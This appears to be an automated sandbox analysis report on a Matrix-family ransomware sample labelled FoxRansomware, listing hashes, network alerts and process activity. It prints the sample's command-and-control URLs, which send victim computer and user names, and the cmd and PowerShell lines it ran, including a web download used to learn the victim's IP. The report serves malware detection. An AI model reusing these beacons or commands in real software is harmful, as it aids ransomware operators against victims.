Overview
overview
10Static
static
FoxRansomw...65.exe
windows7_x64
10FoxRansomw...65.exe
windows10-2004_x64
10FoxRansomw...a7.exe
windows7_x64
10FoxRansomw...a7.exe
windows10-2004_x64
10FoxRansomw...20.exe
windows7_x64
10FoxRansomw...20.exe
windows10-2004_x64
10FoxRansomw...0b.exe
windows7_x64
10FoxRansomw...0b.exe
windows10-2004_x64
10FoxRansomw...53.exe
windows7_x64
10FoxRansomw...53.exe
windows10-2004_x64
10FoxRansomw...b1.exe
windows7_x64
10FoxRansomw...b1.exe
windows10-2004_x64
10Analysis
-
max time kernel
77s -
max time network
112s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
01-02-2022 08:39
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-en-20220112
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-en-20211208
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-en-20220113
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-en-20211208
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-en-20220113
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-en-20211208
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-en-20220113
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-en-20211208
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-en-20220113
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-en-20211208
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-en-20220112
General
-
Target
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
-
Size
1.2MB
-
MD5
907636b28d162f7110b067a8178fa38c
-
SHA1
048ae4691fe267e7c8d9eda5361663593747142a
-
SHA256
6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b
-
SHA512
501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 3 IoCs
Targeted ransomware with information collection and encryption functionality.
Processes:
description flow ioc HTTP URL 17 http://fredstat.000webhostapp.com/addrecord.php?apikey=apikey&compuser=JDQPXOPR|Admin&sid=V4NSb1G7QKhfhqPI&phase=START HTTP URL 146 http://fredstat.000webhostapp.com/addrecord.php?apikey=apikey&compuser=JDQPXOPR|Admin&sid=V4NSb1G7QKhfhqPI&phase=[ALL]0E45F84A59BCFA69 HTTP URL 349 http://fredstat.000webhostapp.com/addrecord.php?apikey=apikey&compuser=JDQPXOPR|Admin&sid=V4NSb1G7QKhfhqPI&phase=0E45F84A59BCFA69|7397|2GB -
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
-
Executes dropped EXE 1 IoCs
Processes:
NWpgfCa6.exepid process 4868 NWpgfCa6.exe -
Enumerates connected drives 3 TTPs 22 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exedescription ioc process File opened (read-only) \??\U: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\Q: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\M: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\L: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\I: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\E: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\W: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\X: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\S: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\P: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\N: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\H: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\G: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\F: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\Y: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\V: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\K: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\Z: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\R: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\O: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\J: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe File opened (read-only) \??\T: 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.execmd.exedescription pid process target process PID 4664 wrote to memory of 2140 4664 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe cmd.exe PID 4664 wrote to memory of 2140 4664 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe cmd.exe PID 4664 wrote to memory of 2140 4664 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe cmd.exe PID 4664 wrote to memory of 4868 4664 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe NWpgfCa6.exe PID 4664 wrote to memory of 4868 4664 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe NWpgfCa6.exe PID 4664 wrote to memory of 4868 4664 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe NWpgfCa6.exe PID 4664 wrote to memory of 1968 4664 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe cmd.exe PID 4664 wrote to memory of 1968 4664 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe cmd.exe PID 4664 wrote to memory of 1968 4664 6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe cmd.exe PID 1968 wrote to memory of 2260 1968 cmd.exe powershell.exe PID 1968 wrote to memory of 2260 1968 cmd.exe powershell.exe PID 1968 wrote to memory of 2260 1968 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe"1⤵
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWpgfCa6.exe"2⤵PID:2140
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWpgfCa6.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWpgfCa6.exe" -n2⤵
- Executes dropped EXE
PID:4868
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\T1qHFNNa.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵PID:2260
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
907636b28d162f7110b067a8178fa38c
SHA1048ae4691fe267e7c8d9eda5361663593747142a
SHA2566e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b
SHA512501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a
-
MD5
907636b28d162f7110b067a8178fa38c
SHA1048ae4691fe267e7c8d9eda5361663593747142a
SHA2566e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b
SHA512501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a